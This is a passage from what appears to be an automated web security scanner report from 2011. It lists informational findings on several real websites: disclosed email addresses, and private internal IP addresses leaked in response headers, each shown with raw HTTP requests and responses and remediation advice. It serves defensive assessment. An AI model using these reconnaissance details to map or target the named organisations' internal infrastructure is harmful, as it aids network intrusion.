ETag: "5214388144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

19.78. http://www.sophelle.com/How-We-Work/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/How-We-Work/

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /How-We-Work/ HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Company/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; __utma=227204639.668059565.1315148193.1315148193.1315148193.1; __utmb=227204639.9.10.1315148193; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-04%2010%3A56%3A09

Response

HTTP/1.1 200 OK
Content-Length: 7541
Content-Type: text/html
Content-Location: http://www.sophelle.com/How-We-Work/index.html
Last-Modified: Tue, 26 Apr 2011 13:16:54 GMT
Accept-Ranges: bytes
ETag: "d4585836144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

19.79. http://www.sophelle.com/Products/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Products/

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /Products/ HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; __utma=227204639.668059565.1315148193.1315148193.1315148193.1; __utmb=227204639.3.10.1315148193; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-04%2010%3A56%3A01

Response

HTTP/1.1 200 OK
Content-Length: 8484
Content-Type: text/html
Content-Location: http://www.sophelle.com/Products/index.html
Last-Modified: Tue, 26 Apr 2011 13:19:31 GMT
Accept-Ranges: bytes
ETag: "e6173a94144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

19.80. http://www.sophelle.com/Services/eCommerce-Cross-Channel-Strategy-Operations.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Services/eCommerce-Cross-Channel-Strategy-Operations.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

Response

HTTP/1.1 200 OK
Content-Length: 9852
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:45 GMT
Accept-Ranges: bytes
ETag: "d88d9c54144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

19.81. http://www.sophelle.com/Success-Stories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Success-Stories/

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

GET /Success-Stories/ HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Contact-Us/thank-you.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotdt=2011-09-04%2010%3A56%3A09; __utma=227204639.668059565.1315148193.1315148193.1315148193.1; __utmb=227204639.6.10.1315148193; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 9245
Content-Type: text/html
Content-Location: http://www.sophelle.com/Success-Stories/index.html
Last-Modified: Tue, 26 Apr 2011 13:17:57 GMT
Accept-Ranges: bytes
ETag: "ef5165c144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

19.82. http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Success-Stories/Automated-Website-Testing.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

Response

HTTP/1.1 200 OK
Content-Length: 9759
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:55 GMT
Accept-Ranges: bytes
ETag: "0bf755a144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

19.83. http://www.sophelle.com/Success-Stories/Project-Lifecycle-Re-Engineering.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Success-Stories/Project-Lifecycle-Re-Engineering.html

Issue detail

The following email address was disclosed in the response:

info@sophelle.com

Request

Response

HTTP/1.1 200 OK
Content-Length: 12239
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:18:03 GMT
Accept-Ranges: bytes
ETag: "f689415f144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 14:54:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

19.84. http://www.spamfighter.com/RSS20.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.spamfighter.com
Path:	/RSS20.aspx

Issue detail

The following email address was disclosed in the response:

scamalerts@fairpoint.com

Request

GET /RSS20.aspx HTTP/1.1
Host: www.spamfighter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: *
Content-Type: text/xml; charset=utf-8
Content-Length: 8295
debugtwotreegeo: US
debugtwotreexff: 50.23.123.106
debugsftfromtreeone: vhigh
debugsfcfromtreeone: US
Date: Sun, 04 Sep 2011 14:14:35 GMT
Connection: close
sft: vhigh
sfc: US
Cache-Control: public
Expires: Sun, 04 Sep 2011 15:14:35 GMT

...<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
<title>SPAMfighter News</title>
<description>The latest news from the world of fighting spam</description>
<l
...[SNIP]...
FairPoint and requesting clients to fill up a verification form to facilitate their clients with enhanced services. </p><p>Customers have received the e-mail message from the mail address scamalerts@fairpoint.com and the subject line opened with an interesting note &quot;Welcome to FairPoint Communications&quot;.</p><p>...</p><p>Read the rest of: <a target="_blank" href="http
...[SNIP]...

19.85. http://www.theregister.co.uk/Design/javascript/_.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theregister.co.uk
Path:	/Design/javascript/_.js

Issue detail

The following email addresses were disclosed in the response:

bhb@iceburg.net
webmaster@theregister.co.uk

Request

Response

20. Private IP addresses disclosed previous next
There are 32 instances of this issue:

http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage
http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home
http://digg.com/submit
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/PFoOGI8L4YA.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/0ITpgsiVMtK.css
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js
http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/ql9vukDCc4R.png
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/Sqr_RMyBDQm.css
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/ZxQqLwC16Cg.css
http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js
http://users.techtarget.com/registration/searchsecurity/Register.page
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/home.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/share.php
http://www.whatisnetwork.com/news-events/114520/kaspersky-website-vulnerable-to-xss.html

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

20.1. http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.1.2.212

Request

Response

20.2. http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corporate.digitalriver.com
Path:	/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.1.2.73

Request

Response

20.3. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.129.225

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=31652 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8468

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
<span title="10.2.129.225 Build: 264 - Fri Sep 2 18:08:38 PDT 2011 19.83ms">
...[SNIP]...

20.4. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/PFoOGI8L4YA.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y-/r/PFoOGI8L4YA.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.196

Request

GET /rsrc.php/v1/y-/r/PFoOGI8L4YA.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FSPAMfighters&width=310&colorscheme=light&show_faces=false&stream=false&header=true&height=62

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 23 Aug 2011 04:14:17 GMT
X-FB-Server: 10.30.147.196
X-Cnection: close
Content-Length: 20592
Vary: Accept-Encoding
Cache-Control: public, max-age=30459191
Expires: Wed, 22 Aug 2012 04:40:45 GMT
Date: Sun, 04 Sep 2011 15:47:34 GMT
Connection: close

/*1314074455,169776068*/

.connect_comment_widget{margin:0 4px;padding:5px 0;position:relative}
.connect_comment_widget .nub{background:transparent url(http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/agyQ
...[SNIP]...

20.5. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/0ITpgsiVMtK.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y3/r/0ITpgsiVMtK.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.190

Request

GET /rsrc.php/v1/y3/r/0ITpgsiVMtK.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FSPAMfighters&width=310&colorscheme=light&show_faces=false&stream=false&header=true&height=62

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 31 Aug 2011 18:33:14 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Content-Length: 18786
Vary: Accept-Encoding
Cache-Control: public, max-age=31201271
Expires: Thu, 30 Aug 2012 18:48:45 GMT
Date: Sun, 04 Sep 2011 15:47:34 GMT
Connection: close

/*1314816571,169776318*/

form{margin:0;padding:0}
label{cursor:pointer;color:#666;font-weight:bold;vertical-align:middle}
label input{font-weight:normal}
textarea,.inputtext,.inputpassword{border:1px
...[SNIP]...

20.6. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y4/r/swbbSSZsgUH.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.190

Request

GET /rsrc.php/v1/y4/r/swbbSSZsgUH.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FSPAMfighters&width=310&colorscheme=light&show_faces=false&stream=false&header=true&height=62

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 25 Aug 2011 03:57:42 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Content-Length: 16037
Vary: Accept-Encoding
Cache-Control: public, max-age=30970968
Expires: Tue, 28 Aug 2012 02:50:22 GMT
Date: Sun, 04 Sep 2011 15:47:34 GMT
Connection: close

/*1314586179,169776318*/

if (window.CavalryLogger) { CavalryLogger.start_js(["KQ3gR"]); }

function ConnectSocialWidget(a,b){ConnectSocialWidget.setInstance(b,this);ConnectSocialWidget.delayUntilDisp
...[SNIP]...

20.7. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/ql9vukDCc4R.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/y7/r/ql9vukDCc4R.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.182

Request

GET /rsrc.php/v1/y7/r/ql9vukDCc4R.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/PFoOGI8L4YA.css

Response

HTTP/1.1 200 OK
Content-Length: 1177
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 08:53:07 GMT
X-FB-Server: 10.138.64.182
Cache-Control: public, max-age=27942596
Expires: Tue, 24 Jul 2012 01:37:30 GMT
Date: Sun, 04 Sep 2011 15:47:34 GMT
Connection: close

.PNG
.
...IHDR...............2...#PLTE.........444...l........6X.......fff...s.....ddd...DDDUUUQl..E.......`x.......;Y..........MMMcx.u.................bw.............uuu...............h.......Xj.
...[SNIP]...

20.8. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/Sqr_RMyBDQm.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yB/r/Sqr_RMyBDQm.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.199

Request

GET /rsrc.php/v1/yB/r/Sqr_RMyBDQm.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FSPAMfighters&width=310&colorscheme=light&show_faces=false&stream=false&header=true&height=62

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 29 Aug 2011 02:07:34 GMT
X-FB-Server: 10.30.145.199
X-Cnection: close
Content-Length: 8686
Vary: Accept-Encoding
Cache-Control: public, max-age=30975795
Expires: Tue, 28 Aug 2012 04:10:49 GMT
Date: Sun, 04 Sep 2011 15:47:34 GMT
Connection: close

/*1314591019,169775559*/

.fbDarkWidget .fan_box,
.fbDarkWidget .uiStream .uiStreamMessage{color:#808080}
.fbDarkWidget .fan_box a{color:#ccc}
.fan_box .full_widget{border:solid 1px #94a3c4;background
...[SNIP]...

20.9. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yC/r/vneZ6lOGBMV.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.186

Request

GET /rsrc.php/v1/yC/r/vneZ6lOGBMV.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FSPAMfighters&width=310&colorscheme=light&show_faces=false&stream=false&header=true&height=62

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 02 Sep 2011 19:06:55 GMT
X-FB-Server: 10.138.69.186
Content-Length: 50890
Vary: Accept-Encoding
Cache-Control: public, max-age=31375882
Expires: Sat, 01 Sep 2012 19:18:56 GMT
Date: Sun, 04 Sep 2011 15:47:34 GMT
Connection: close

/*1314991115,176833978*/

if (window.CavalryLogger) { CavalryLogger.start_js(["T8H\/g"]); }

var XD={_callbacks:[],_opts:{autoResize:false,allowShrink:true,channelUrl:null,hideOverflow:false,newResize
...[SNIP]...

20.10. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/ZxQqLwC16Cg.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yH/r/ZxQqLwC16Cg.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.182

Request

GET /rsrc.php/v1/yH/r/ZxQqLwC16Cg.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FSPAMfighters&width=310&colorscheme=light&show_faces=false&stream=false&header=true&height=62

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 31 Aug 2011 22:46:27 GMT
X-FB-Server: 10.138.17.182
Content-Length: 21491
Vary: Accept-Encoding
Cache-Control: public, max-age=31216400
Expires: Thu, 30 Aug 2012 23:00:54 GMT
Date: Sun, 04 Sep 2011 15:47:34 GMT
Connection: close

/*1314831657,176820662*/

.async_throbber .async_saving{background:url(http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif) no-repeat right;padding-right:20px}
.async_throbber_left .async_savi
...[SNIP]...

20.11. http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yn/r/fXOlnGV2onC.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.182

Request

GET /rsrc.php/v1/yn/r/fXOlnGV2onC.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FSPAMfighters&width=310&colorscheme=light&show_faces=false&stream=false&header=true&height=62

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 29 Aug 2011 19:10:51 GMT
X-FB-Server: 10.138.64.182
Content-Length: 97930
Vary: Accept-Encoding
Cache-Control: public, max-age=31032309
Expires: Tue, 28 Aug 2012 19:52:43 GMT
Date: Sun, 04 Sep 2011 15:47:34 GMT
Connection: close

/*1314647580,176832694*/

if (window.CavalryLogger) { CavalryLogger.start_js(["VfnZ3"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string|
...[SNIP]...

20.12. http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yq/r/346Pl_u5ziA.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.195

Request

GET /rsrc.php/v1/yq/r/346Pl_u5ziA.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FSPAMfighters&width=310&colorscheme=light&show_faces=false&stream=false&header=true&height=62

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 01 Sep 2011 16:21:10 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Content-Length: 42991
Vary: Accept-Encoding
Cache-Control: public, max-age=31279746
Expires: Fri, 31 Aug 2012 16:36:40 GMT
Date: Sun, 04 Sep 2011 15:47:34 GMT
Connection: close

/*1314894989,169776067*/

if (window.CavalryLogger) { CavalryLogger.start_js(["2pLAL"]); }

void(1);window.__DEV__=window.__DEV__||0;if(!window.skipDomainLower&&navigator&&navigator.userAgent&&documen
...[SNIP]...

20.13. http://users.techtarget.com/registration/searchsecurity/Register.page previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://users.techtarget.com
Path:	/registration/searchsecurity/Register.page

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.200.1.101

Request

GET /registration/searchsecurity/Register.page HTTP/1.1
Host: users.techtarget.com
Accept: */*
